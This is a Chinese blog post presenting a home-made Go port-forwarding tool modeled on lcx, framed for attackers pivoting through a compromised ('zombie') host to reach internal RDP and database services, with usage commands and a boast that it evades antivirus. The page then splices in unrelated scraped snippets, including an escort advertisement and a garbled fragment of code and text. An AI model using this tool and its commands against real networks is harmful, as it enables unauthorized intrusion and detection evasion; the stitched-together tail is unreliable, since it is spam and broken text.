经常有朋友使用lcx,但是由于很多原因可能lcx都不好使,例如下面几点:
1、linux下不支持lcx,这时只能拿msf出来;
2、不免杀;
3、每次内网要重新连接其他主机的时候,都必须重新进去并重新敲打命令 ,并且操作过多时容易被发现。
最近正好上面那些问题都碰上了,于是没办法就使用golang自己写了一个。我写的这个lcx有以下几个特点:
1、golang程序跨平台性,甚至嵌入式Linux都支持;
2、免杀,基本上目前golang程序都不会被识别为病毒;
3、肉鸡只需操作一次,其他的都交给主控端操作。
该工具运行界面如下所示:
为了讲解该工具的功能和使用 *** ,以下列场景展开介绍:
前提介绍:
*** 拓扑如上图所示,内网私有,外网无法直接访问内网任意主机,但其中A已经控制了B。
实现目标:
攻击者A通过B 连接内网中任意一台计算机(如远程桌面,数据库等)。
之一步: 在B上面输入指令:
lcx 111.13.100.92 123
第二步:假如 A 想连接内网中 C 的远程桌面,那么在A上输入指令:
lcx 456 123 192.168.10.3 3389
这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。
之一步,在B上输入指令:
lcx 111.13.100.92 123
第二步,在A上输入指令:
lcx 1433 123 192.168.10.55 1433
这时,A只用连接本机1433端口就等于连接内网中(192.168.10.55)的1433端口了。
暂时只提供windows版本:lcx._g
在线预约深圳高端商务陪伴小学妹经纪人资料留言【孔世群】,上海是一座成功人士的聚集地,对商业模特的需求也是比较大的,今天明星商务分享模特访梦,年龄上海 女 26,婚姻:未婚,学历:高中,气质:清纯美女在...
很多科技文章都未来展望iPhone除开4.7寸和5.6寸的最新款iPhone将发布以外,另有可能发布一款可衣着精密机械制造,因为美国苹果公司已在年7月得到 一项智能手环专利权,因而这一款可衣着精密机械...
本文导读目录: 1、如何抓黑客侵入Windows系统 2、如何找到黑客伪装的程序 3、寻找黑客帮助 4、网络安全警察是怎样查处黑客的,是通过查找其IP地址么 5、我被网络诈骗想找红客或...
有人说大数据是「石油」是「黄金」,涂子沛说大数据是「土壤」,而马云说大数据是「生产资料」,我觉得他们说得都对,但是也都不对。 因为大数据就是「大数据」。 当大数据应用在不同的领域和不同的场景下,所...
优惠券使用攻略 相信很多读者朋友都使用过淘宝优惠券,但是一般使用的都是在宝贝下方,商家给的优惠券,这种优惠券的力度比较小。 看到领取优惠券的位置了吗?这里可以领取店铺的优惠券。 下面给大...
附录2、关于360终端安全实验室pip install -r dependencies.txt return a().StrToLong(str, i);服务器地址 Andr...